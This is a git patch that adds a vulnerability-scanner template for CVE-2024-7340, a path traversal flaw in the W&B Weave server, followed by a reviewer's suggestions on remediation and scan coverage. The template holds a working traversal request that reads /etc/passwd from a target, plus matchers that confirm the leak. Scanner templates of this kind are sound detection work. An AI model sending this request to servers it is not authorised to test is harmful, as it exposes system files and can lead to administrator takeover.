From 43e7e45180ccbac5df54b87c0f23bddc606d3006 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 1 Aug 2024 19:10:00 +0530
Subject: [PATCH] Create CVE-2024-7340.yaml
---
http/cves/2024/CVE-2024-7340.yaml | 46 +++++++++++++++++++++++++++++++
1 file changed, 46 insertions(+)
create mode 100644 http/cves/2024/CVE-2024-7340.yaml
diff --git a/http/cves/2024/CVE-2024-7340.yaml b/http/cves/2024/CVE-2024-7340.yaml
new file mode 100644
index 0000000000..3af097a17c
--- /dev/null
+++ b/http/cves/2024/CVE-2024-7340.yaml
@@ -0,0 +1,46 @@
+id: CVE-2024-7340
+
+info:
+ name: W&B Weave Server - Remote Arbitrary File Leak
+ author: iamnoooob,rootxharsh,pdresearch
+ severity: high
+ description: |
+ The Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.
+ reference:
+ - https://github.com/advisories/GHSA-r49h-6qxq-624f
+ - https://github.com/wandb/weave/pull/1657
+ - https://research.jfrog.com/vulnerabilities/wandb-weave-server-remote-arbitrary-file-leak-jfsa-2024-001039248/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-7340
+ epss-score: 0.00043
+ epss-percentile: 0.09404
+ metadata:
+ verified: true
+ max-request: 1
+ tags: cve,cve2024,lfr,weave,wandb
+
+http:
+ - raw:
+ - |
+ GET /__weave/file/tmp/weave/fs/../../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+ - type: word
+ part: header
+ words:
+ - "application/octet-stream"
+ - "filename=passwd"
+ condition: and
+
+ - type: status
+ status:
+ - 200
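Review bot: The `info` block has no `remediation` field and `classification` has no `cwe-id`, so a hit tells the operator what is wrong but not what to do about it. I would add `remediation: Upgrade Weave to a release that includes the fix from wandb/weave pull request 1657.` under `info`, and `cwe-id: CWE-22` under `classification`, since the description is a path traversal. Separately, `cvss-metrics` says `PR:L` but the request carries no credentials, so a server that enforces authentication on `/__weave/file/` would presumably fail the `status: 200` matcher and be reported as unaffected. A YAML comment above the `raw` request noting that the check covers only instances reachable without authentication, and only hosts with a Unix `/etc/passwd`, would keep a clean scan from being read as proof the host is patched.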